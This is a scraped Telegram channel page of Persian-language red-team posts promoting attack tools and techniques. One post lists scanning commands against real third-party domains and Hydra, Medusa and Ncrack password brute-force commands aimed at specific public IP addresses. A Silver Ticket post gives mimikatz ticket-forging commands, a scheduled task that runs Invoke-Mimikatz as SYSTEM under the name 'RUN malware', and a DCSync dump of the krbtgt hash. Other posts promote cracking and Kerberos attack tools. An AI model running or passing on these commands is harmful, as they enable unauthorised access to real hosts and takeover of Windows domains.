RedTeam


Гео и язык канала: не указан, не указан
Категория: не указана


Topics:
Red team (NetWork)❗️
coding(c,python,powershell,bash)🧑‍💻
Phishing 👂
Penetration testing 👁
vulnerability 🦠
ransomware 👾
Red Team group = @RedTeamAPTchat
Instagram: https://www.instagram.com/redteamapt
Youtube:
https://youtube.com/@redteam_apt

Связанные каналы

Гео и язык канала
не указан, не указан
Категория
не указана
Статистика
Фильтр публикаций


MITRE ATTACK 🔥
#Reconnaissance
#Active_Scanning PART 3 , last part
#Wordlist_Scanning
COMMAND :
sublist3r -d jazztel.com
amass enum -d jazztel.com
dirb https://spdf.gsfc.nasa.gov
ffuf -u https://ftp.fau.de/FUZZ -w /usr/share/wordlists/wfuzz/general/common.txt -mc 200
dnsmap ftp.fau.de
subfinder -d jazztel.com -t 50
hydra -l administrator -P /home/kali/Downloads/rockyou.txt rdp://83.171.248.255 -v -w 3
medusa -h 129.121.18.77 -u root -P pass1.txt -M ssh
ncrack -p 3389 --user administrator -P pass.txt 173.212.209.193
@RedTeamAPT


Видео недоступно для предпросмотра
Смотреть в Telegram
MITRE ATTACK 🔥
#Reconnaissance
#Active_Scanning PART 3 , last part
#Wordlist_Scanning

ابزار های معرفی شده
#Sublist3r
#Amass
#Dirbuster
#Ffuf
#DNSMap
#Subfinder
#Hydra
#Medusa
#Ncrack
ابزار نوشته شده برای تست با زبان PHP
@RedTeamAPT


#SILVER_ticket command : 🔥
kerberos::golden /admin:ahmad /domain:RED.TEAM /id:500 /sid:S-1-5-21-1807605247-2408605128-2947868414 /target:DC.RED.TEAM /rc4:d3b48a0ef60cbfb15408db43d32fa96f /service:cifs,host,ldap /ticket:silver
kerberos::ptt silver
Rubeus.exe ptt /ticket:silver
dir \\DC\c$\

schtasks /create /S DC.RED.TEAM /SC DAILY /RU "NT AUTHORITY\SYSTEM" /TN "RUN malware" /TR "powershell.exe -ExecutionPolicy Bypass -File c:\windows\temp\Invoke-Mimikatz.ps1"
schtasks /query /S DC.RED.TEAM

mimikatz # lsadump::dcsync /dc:DC.RED.TEAM /domain:RED.TEAM /user:krbtgt
@RedTeamAPT
@RedTeamAPTchat


Видео недоступно для предпросмотра
Смотреть в Telegram
#SILVER_ticket
CIFS
LDAP
HOST
SCHtasks
DCSync

توضیحات و فرق golden ticket و silver ticket
دسترسی کامل به DC
اجرا و بدست اوردن HASH همه یوزر ها
اجرا SCHtasks
@RedTeamAPT


🔓 Ncrack:
ابزاری قدرتمند برای حملات brute force! 💻💥

اگر دنبال یک ابزار سریع و کارآمد برای تست پسورد در سرویس‌های مختلف مثل SSH, RDP, FTP, Telnet و... هستید، Ncrack بهترین انتخاب برای شماست! 🚀

🔹 ویژگی‌ها:
- ⚡️ تست همزمان پسوردهای مختلف
- 🌐 پشتیبانی از پروتکل‌های متعدد: SSH, RDP, FTP, VNC و...
- 🚀 سرعت بالا در انجام حملات
- 📊 گزارش‌دهی دقیق و جامع

🔹 چرا Ncrack؟
- 🔑 به‌راحتی می‌توانید پسوردهای ضعیف را شناسایی و از آسیب‌پذیری‌ها بهره‌برداری کنید.
- 🛠 از ویژگی‌های پیشرفته مثل استفاده از پروکسی، محدود کردن سرعت و تنظیم تعداد تردها برای بهینه‌سازی حملات برخوردار است.


👾 @RedTeamAPT
BOOST ⚡️🚀


🚨 حمله به سیستم‌های RDP با استفاده از CVE-2019-0708 (BlueKeep) 🔓💻

آسیب‌پذیری CVE-2019-0708
که با نام BlueKeep شناخته میشه، یکی از خطرناک‌ترین آسیب‌پذیری‌ها در Remote Desktop Protocol (RDP) هست که می‌تونه بدون نیاز به تعامل کاربر و به‌صورت خودکار به سیستم‌های ویندوزی نفوذ کنه! 👾

💥 ویژگی‌ها و خطرات این آسیب‌پذیری:
- اجرای کد از راه دور: مهاجم می‌تونه بدون تایید اعتبار، کد اجرایی خودش رو روی سیستم‌های آسیب‌پذیر اجرا کنه.
- دسترسی کامل به سیستم: بعد از نفوذ، مهاجم می‌تونه دسترسی کامل به سیستم‌های آسیب‌پذیر پیدا کنه.
- پهنه‌سازی سریع: BlueKeep می‌تونه خیلی سریع در شبکه‌ها گسترش پیدا کنه و باعث آسیب به دستگاه‌های زیادی بشه.
- پتانسیل برای حملات باج‌افزار: این آسیب‌پذیری می‌تونه به حملات خطرناک باج‌افزاری مثل WannaCry منجر بشه.

⚠️ این آسیب‌پذیری باید به سرعت برطرف بشه، چون مهاجمین می‌تونن با استفاده از BlueKeep به راحتی شبکه‌ها رو مورد حمله قرار بدن و خسارت‌های جبران‌ناپذیری وارد کنن.


👾 @RedTeamAPT
BOOST ⚡️🚀


🚨 Golden Ticket vs Silver Ticket:
چطور مهاجم‌ها در دنیای Kerberos بازی می‌کنند؟


💥 دو روش معروف برای نفوذ به شبکه‌های ویندوز:
Golden Ticket و Silver Ticket!
اما این دوتا چطور با هم فرق دارن؟

🔑 Golden Ticket:
- دسترسی به همه سرویس‌ها و منابع دامنه
- کلید طلایی برای عبور از هر درب بسته
- فقط با دسترسی به حساب KRBTGT می‌تونی اینو بسازی
- قدرت خیلی بیشتر و ماندگارتر

🎯 Silver Ticket:
- دسترسی به یک سرویس خاص، نه همه جا
- مثل یک بلیت تک‌ورود به یک جایی خاص
- بیشتر برای نفوذ محدود و هدفمند

🎮 کدوم رو انتخاب می‌کنی؟
خب Golden Ticket یه‌جور کلید جادویی هست، اما Silver Ticket بیشتر شبیه یک بلیت تک‌ورود به یه هدف خاص. بسته به استراتژی و سطح دسترسی‌تون، یکی رو باید انتخاب کنید! ⚡️
👾 @RedTeamAPT
BOOST ⚡️🚀


ابزار John the Ripper برای کرک کردن پسوردها 🔓🕵️‍♂️

ابزار John the Ripper
متن‌باز و قدرتمند برای کرک کردن پسوردها است که به طور خاص برای تحلیل و شکستن پسوردهای رمزنگاری‌شده طراحی شده است. این ابزار یکی از معروف‌ترین و پرکاربردترین ابزارها در دنیای تست نفوذ است و از الگوریتم‌های مختلفی برای کرک کردن پسوردها استفاده می‌کند.

🔹 ویژگی‌ها و خطرات:
- پشتیبانی از فرمت‌های مختلف پسورد: John the Ripper قادر است پسوردهای مختلف رمزنگاری‌شده را از جمله LM hash, NTLM hash, MD5, SHA-1 و بسیاری دیگر کرک کند.
- حمله با استفاده از لیست پسورد: این ابزار از لیست‌های پسورد مانند rockyou.txt برای حمله استفاده می‌کند.
- حمله به سیستم‌های مختلف: John the Ripper می‌تواند به سیستم‌های UNIX, Windows, macOS و از جمله فایل‌های ZIP حمله کند.

🚨 چرا باید از John the Ripper استفاده کنیم؟
- پشتیبانی از انواع رمزنگاری‌ها: این ابزار از طیف وسیعی از الگوریتم‌های رمزنگاری پشتیبانی می‌کند که آن را به ابزاری عالی برای آزمایش‌های نفوذ تبدیل کرده است.

👾 @RedTeamAPT
BOOST ⚡️🚀


آسیب‌پذیری CVE-2021-26855 در Microsoft Exchange Server 🕵️‍♂️💥

یکی از معروف‌ترین آسیب‌پذیری‌های Microsoft Exchange Server
که در سال 2021 کشف شد، CVE-2021-26855 است. این آسیب‌پذیری به هکرها اجازه می‌دهد که بدون نیاز به احراز هویت، به سیستم‌های آسیب‌پذیر دسترسی پیدا کنند و اقدام به دستکاری ایمیل‌ها، نصب بدافزار و حتی دسترسی به اطلاعات حساس کنند.

🔹 ویژگی‌ها و خطرات:
- عدم نیاز به احراز هویت: هکرها می‌توانند بدون نیاز به پسورد یا اعتبارسنجی به سیستم وارد شوند.
- دسترسی به ایمیل‌ها و اطلاعات حساس: این آسیب‌پذیری به مهاجمین این امکان را می‌دهد که به تمامی ایمیل‌ها و اطلاعات ذخیره شده در سیستم دسترسی داشته باشند.
- نصب بدافزار: این آسیب‌پذیری می‌تواند منجر به نصب بدافزار یا حتی حملات Ransomware شود.
- پهنه‌سازی سریع: به دلیل عدم نیاز به احراز هویت، این آسیب‌پذیری می‌تواند به سرعت در شبکه‌های آسیب‌پذیر پخش شود.

🚨 چرا باید نگران این آسیب‌پذیری باشیم؟
- بدون احراز هویت: مهاجم فقط کافی است که به پورت آسیب‌پذیر Exchange Server متصل شود تا دسترسی پیدا کند.

👾 @RedTeamAPT
BOOST ⚡️🚀


Видео недоступно для предпросмотра
Смотреть в Telegram
Hping3 : 👁
این دستور پیام "welcome to RedTeamAPT" را به صورت هگزادسیمال در بسته ICMP ارسال می‌کند

hping3 -c 1 -n 192.168.141.140 -e "welcome to RedTeamAPT" -1

👾 @RedTeamAPT
BOOST ⚡️🚀


#powershell for #pentest : 🔥

Import-Module: .\PowerSploit.psd1
این دستور در پاورشل (PowerShell) برای وارد کردن یک ماژول به نام PowerSploit به محیط پاورشل استفاده می‌شود:
powershell
Import-Module:

این دستور برای وارد کردن ماژول‌ها به پاورشل به کار می‌رود، تا بتوانید از توابع و دستورات آن ماژول در جلسه پاورشل استفاده کنید.

.\PowerSploit.psd1:
این پارامتر اشاره به فایلی به نام PowerSploit.psd1 در مسیر فعلی (. نشان‌دهنده مسیر فعلی است) دارد. فایل .psd1، فایل توصیف‌گر ماژول پاورشل است که اطلاعاتی درباره ماژول مانند نسخه، توابع، و متعلقات آن را در بر دارد.
@RedTeamAPT
BOOST ⚡️🚀


🔥 مسیر wordlist های kali linux برای password cracking و enumeration
@RedTeamAPT
BOOST ⚡️🚀


حمله Brute Force با Hydra 🔓💥

یکی از ابزارهای محبوب برای انجام حملات Brute Force است که با استفاده از لیست‌های پسورد بزرگ (مثل rockyou.txt) می‌تواند به راحتی به حساب‌های کاربری مختلف حمله کند. این ابزار به ویژه برای تست امنیتی در سیستم‌ها و وب‌سایت‌ها بسیار مفید است و به شما این امکان را می‌دهد که پسوردهای ضعیف را شبیه‌سازی کنید.

🔹 ویژگی‌های برجسته:
- پشتیبانی از بیش از 50 پروتکل: از جمله SSH, FTP, HTTP, RDP و بسیاری دیگر.
- استفاده از لیست‌های پسورد سفارشی: شما می‌توانید از لیست‌های پسورد مختلف برای انجام حملات استفاده کنید.
- چندین ترد همزمان: Hydra می‌تواند حملات را با سرعت بالا و در زمان کوتاه‌تری انجام دهد.

🔓 چرا Hydra؟ اگر می‌خواهید حملات Brute Force سریع و کارآمدی انجام دهید، Hydra با قابلیت‌های گسترده‌اش انتخابی عالی است. با Hydra می‌توانید از زبان‌های مختلف و پروتکل‌های متعدد استفاده کنید تا آسیب‌پذیری‌های پسورد را شناسایی کنید و سیستم‌های ضعیف را تست کنید.

کد ساده برای استفاده از Hydra:
hydra -l administrator -P /path/to/rockyou.txt rdp://IP -t 4
👾 @RedTeamAPT
BOOST ⚡️🚀


DirBuster 🚀
یک ابزار قدرتمند برای کشف دایرکتوری‌ها و فایل‌های پنهان در وب‌سایت‌ها است. این ابزار با استفاده از حملات Brute Force و لیست کلمات پیش‌فرض، مسیرهایی که به‌طور عمومی در دسترس نیستند (مانند صفحات مدیریتی، فایل‌های پیکربندی و ...) را شناسایی می‌کند. هدف آن شبیه‌سازی حمله به سرورهای وب برای پیدا کردن نقاط ضعف امنیتی است. 🔍

🔧 ویژگی‌های جذاب DirBuster:
- شکاف‌گذاری دایرکتوری‌ها و فایل‌ها 💻
- پشتیبانی از لیست‌های کلمات برای جستجوی فایل‌های پنهان 🔑
- پروکسی و فیلترهای HTTP برای حفظ حریم خصوصی 🌐
- سرعت بالا با تنظیم تعداد رشته‌ها (threads) ⚡️

👨‍💻 با استفاده از DirBuster، می‌توانید دایرکتوری‌های مخفی و فایل‌های حساس وب‌سایت‌ها را شناسایی کرده و در تست نفوذ خود از آن‌ها استفاده کنید.

بازیابی پنهانی مسیرها، یکی از بهترین راه‌ها برای کشف آسیب‌پذیری‌هاست! 💥

@RedTeamAPT

502 0 19 10 8

#powershell for #pentest : 🔥
Install-Module -Name SSH
این دستور در پاورشل (PowerShell) برای نصب یک ماژول با نام SSH از PowerShell Gallery استفاده می‌شود:

Install-Module:
این دستور برای نصب ماژول‌ها از PowerShell Gallery یا سایر مخازن استفاده می‌شود.
-Name SSH:
این پارامتر برای مشخص کردن نام ماژول مورد نظر به کار می‌رود، که در اینجا SSH است.

با استفاده از این دستور، پاورشل به صورت خودکار به گالری پاورشل متصل می‌شود و ماژول مورد نظر را دانلود و نصب می‌کند. این امکان به کاربران اجازه می‌دهد تا از قابلیت‌های این ماژول (مثل اتصال از طریق SSH، مدیریت کلیدها، اجرای دستورات از راه دور و...) استفاده کنند.
به عنوان مثال، نصب ماژول‌های مرتبط با SSH مانند Posh-SSH به شما کمک می‌کند تا بتوانید از طریق پاورشل با سرورها از راه دور ارتباط برقرار کنید.
@RedTeamAPT


#powershell for #pentest : 🔥
find-module -tag SSH
در پاورشل (PowerShell) برای جستجوی ماژول‌هایی است که با تگ SSH برچسب‌گذاری شده‌اند.
این دستور از PowerShell Gallery برای یافتن ماژول‌های مرتبط با کلمه کلیدی یا تگ SSH استفاده می‌کند.
این دستورات می‌تواند به شما کمک کند تا ماژول‌هایی که برای کار با SSH توسعه داده شده‌اند را پیدا کنید و از آن‌ها در اسکریپت‌های خود استفاده کنید.
find-module :

این یک دستور پاورشل برای جستجو در PowerShell Gallery است. با استفاده از این دستور می‌توانید ماژول‌های موجود در گالری را پیدا کنید.
- tag SSH :

این پارامتر جستجو را محدود می‌کند به ماژول‌هایی که با تگ SSH مرتبط هستند. در PowerShell Gallery، ماژول‌ها با تگ‌های خاصی دسته‌بندی می‌شوند تا جستجو و یافتن ماژول‌های مرتبط با نیازهای خاص راحت‌تر باشد. با استفاده از این تگ، می‌توانید ماژول‌هایی که قابلیت‌های مرتبط با SSH را دارند (مانند اتصال، مدیریت یا ایجاد ارتباط SSH) پیدا کنید.
@RedTeamAPT


MITRE ATTACK 🔥
loading ... 🔄 💻
#Reconnaissance
#Active_Scanning PART 3
#Wordlist_Scanning

در هفته اینده قسمت آخر از #Active_Scanning بارگذاری خواهد شد .
@RedTeamAPT


🚨 ابزار Rubeus: یک ابزار قدرتمند برای حملات Kerberos در شبکه‌های Active Directory 💻🔐

🔍 با Rubeus می‌توانید این کارها رو انجام بدید:

1. 🎯 کپچر تیکت‌های Kerberos
2. 🏆 ساخت Golden Tickets
3. 🔑 ساخت Silver Tickets
4. 🔥 اجرای حملات Kerberoasting
5. 💥 اجرای حملات Pass-the-Hash (PTH)
6. 🎟 انجام حملات Pass-the-Ticket (PTT)
7. 👤 مهاجرت به حساب‌های دیگه با استفاده از Kerberos
8. 💾 استخراج اطلاعات Kerberos از حافظه
9. 🔄 درخواست تیکت‌های Kerberos از KDC
10. ⏳ انجام حملات Ticket Renewal

⚠️ ابزار بی نظیر Rubeus برای post-exploitation و privilege escalation در دنیای هک و امنیت سایبری است. 🌐

@RedTeamAPT


#powershell for #pentest : 🔥
گالری پاورشل (PowerShell Gallery) یک منبع آنلاین رسمی است که توسط مایکروسافت مدیریت می‌شود و به عنوان یک مخزن مرکزی برای اشتراک‌گذاری و نصب ماژول‌ها، اسکریپت‌ها، و منابع پاورشل عمل می‌کند.
گالری پاورشل به توسعه‌دهندگان، مدیران سیستم، و کاربران پاورشل این امکان را می‌دهد که ابزارها و اسکریپت‌های نوشته‌شده توسط دیگران را دانلود و استفاده کنند و همچنین ابزارهای خود را با دیگران به اشتراک بگذارند.
@RedTeamAPT


#SILVER_ticket ATTACK 🔥
.
آموزش این ATTACK نیز تا چند روز اینده قرار خواهد گرفت
.
بنظر میرسد Silver Ticket ها میتوانند خطرناکتر از Golden Ticket ها باشند
در حالیکه دامنه آن نسبت به Golden Ticketها محدودتر است hash مورد نیاز آسان تر بدست می آید و هنگام استفاده از آنها هیچ ارتباطی با DC وجود ندارد بنابراین تشخیص Silver Ticketها از golden ticket برای SOC نیز دشوار تر است .

@RedTeamAPT

Показано 20 последних публикаций.